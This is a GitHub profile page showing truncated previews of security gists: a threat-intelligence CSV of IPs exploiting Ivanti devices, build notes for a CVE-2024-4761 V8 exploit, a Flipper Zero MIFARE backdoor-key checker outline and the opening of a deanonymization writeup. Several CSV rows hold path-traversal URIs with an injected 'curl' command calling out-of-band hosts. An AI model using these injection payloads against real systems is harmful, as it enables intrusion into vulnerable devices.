Skip to content

Instantly share code, notes, and snippets.

View HockeyInJune's full-sized avatar

Julian Cohen HockeyInJune

80 followers · 85 following
View GitHub Profile
@andrew-morris
andrew-morris / ivanti.csv
Last active February 8, 2024 09:55
IPs that are scanning for, or exploiting, vulnerable Ivanti devices (a la GreyNoise) - Updated Feb 01 2024
We can make this file beautiful and searchable if this error is corrected: Unclosed quoted field in line 5.
Start Time, Stop Time, Src IP, Src Country, Src ASN Name, URI, URI Path
1705410897884,1705410913832,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code","/api/v1/totp/user-backup-code"
1705427130797,1705427132894,45.77.220.169,US,"AS-CHOOPA","<IP>/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection","/api/v1/totp/user-backup-code/../../system/maintenance/archiving/cloud-server-test-connection"
1705438981268,1705438981905,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me","/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjeu0rug2jtmq11nqdg1ighbxa4hu4mz.oast.me"
1705439136337,1705439136975,150.242.86.45,IN,"TRIPLE PLAY BROADBAND PRIVATE LIMITED","<IP>/api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20cmjev7jug2jtnphga8igpw9kab6pazpi5.oast.pro","/api/v1/totp/user-backup-code/../../
@mistymntncop
mistymntncop / CVE-2024-4761.js
Last active May 6, 2025 03:44
// Build d8 using:
// a) Run once
// git checkout 6f98fbe86a0d11e6c902e2ee50f609db046daf71
// gclient sync
// gn gen ./out/x64.debug
// gn gen ./out/x64.release
//
// b)
// Debug Build:
// ninja -C ./out/x64.debug d8
@dmaynor
dmaynor / gist:f1973ae244b5c2ed83d3b8e19f798f97
Created August 16, 2024 23:55
Mifare crypto backdoor flipper app
Creating a Flipper Zero app to test for this attack involves writing a script that can interact with the RFID module on the Flipper Zero to perform the necessary steps. The Flipper Zero uses a scripting language called **.fap** (Flipper App) format, typically written in C or a high-level scripting language, but it also supports custom Python-like scripting with `flipperzero-tui`.
Here's a basic outline for creating an app that can check for the presence of the backdoor key on a MIFARE Classic card. Note that this is a simplified version and assumes some familiarity with Flipper Zero's development environment.
### **Step 1: Set Up the Development Environment**
1. **Install Flipper Zero SDK:**
- Follow the official [Flipper Zero documentation](https://github.com/flipperdevices/flipperzero-firmware) to set up the SDK and development environment.
2. **Clone the Flipper Zero Firmware:**
@hackermondev
hackermondev / research.md
Last active August 11, 2025 09:26
Unique 0-click deanonymization attack targeting Signal, Discord and hundreds of platform

hi, i'm daniel. i'm a 15-year-old high school junior. in my free time, i hack billion dollar companies and build cool stuff.

3 months ago, I discovered a unique 0-click deanonymization attack that allows an attacker to grab the location of any target within a 250 mile radius. With a vulnerable app installed on a target's phone (or as a background application on their laptop), an attacker can send a malicious payload and deanonymize you within seconds--and you wouldn't even know.

I'm publishing this writeup and research as a warning, especially for journalists, activists, and hackers, about this type of undetectable attack. Hundreds of applications are vulnerable, including some of the most popular apps in the world: Signal, Discord, Twitter/X, and others. Here's how it works:

Cloudflare

By the numbers, Cloudflare is easily the most popular CDN on the market. It beats out competitors such as Sucuri, Amazon CloudFront, Akamai, and Fastly. In 2019, a major Cloudflare outage k